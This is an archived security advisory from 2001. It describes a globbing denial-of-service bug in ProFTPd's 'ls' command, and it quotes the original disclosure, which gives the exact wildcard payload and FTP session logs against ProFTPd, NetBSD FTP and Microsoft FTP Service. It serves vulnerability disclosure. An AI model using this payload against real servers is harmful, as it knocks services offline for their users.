SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   ProFTPD Vendors:   ProFTPd
ProFTP May Allow Remote Users to Deny Service on the Server
SecurityTracker Alert ID:  1001119
SecurityTracker URL:  http://securitytracker.com/id/1001119
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 19 2001
Impact:   Denial of service via network


Description:   ProFTPd, along with several other FTP daemons, is reported to contain a vulnerability that allows remote users to consume resources on the FTP server.

The ProFTPd's built-in 'ls' command contains a globbing bug that allows remote denial-of-service attacks.

The following command will reportedly consume 100% of CPU time on the server, which can lead to denial of service conditions:

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*

Other affected servers are NetBSD FTP and Microsoft FTP Service (Version 5.0).

Impact:   A remote user with access to the FTP server can execute a command that will cause the server to consume a significant amount of CPU resources.
Solution:   No solution was available at the time of this entry.
Cause:   Resource error

Message History:   This archive entry has one or more follow-up message(s) listed below.
Re: ProFTP May Allow Remote Users to Deny Service on the Server
This is a follow-up message in which a user indicates that this globbing vulnerability is really a general globbing issue with operating systems, not necessarily with specific FTP servers.
Re: ProFTP May Allow Remote Users to Deny Service on the Server
This is a follow-up message that contains demonstration exploit perl code.
(Mandrake Issues Fix) ProFTP May Allow Remote Users to Deny Service on the Server
The vendor has released a fix.
(Conectiva Issues Fix) ProFTP May Allow Remote Users to Deny Service on the Server
The vendor has released a fix.



 Source Message Contents

Subject:  Multiple vendors FTP denial of service


- Proftpd built-in 'ls' command has a globbing bug that allows remote
denial-of-service.

  Here's a simple exploit, tested on the Proftpd site :

$ ftp ftp.proftpd.org
...
Name (ftp.proftpd.org:j): ftp
...
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 Entering Passive Mode (216,10,40,219,4,111).
421 Service not available, remote server timed out. Connection closed

  That command takes 100% CPU time on the server. It can lead into an easy
DOS even if few remote simultanous connections are allowed.

  Other FTP servers may be concerned as well. Here are various tries :

- NetBSD FTP showed the same behavior than Proftpd :

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 EPRT command successful.
(long delay)
421 Service not available, remote server timed out. Connection closed

So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a
possible DOS. Other BSD FTP may be affected as well.

- Microsoft FTP Service (Version 5.0) seems also confused by the command :
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
500 'EPSV': command not understood
227 Entering Passive Mode (207,46,133,140,4,223).
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
(very long delay... nothing happens...)

- Publicfile refuses the command :

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 =131,193,178,181,97,222
550 Sorry, I can't open that file: file does not exist.

- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and
displayed.

- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard
expression to *" and the 'ls *' output.


  Maintainers of vulnerable servers have been warned of this bug.

--
  -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=-
		LINAGORA SA (Paris, France) : http://www.linagora.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC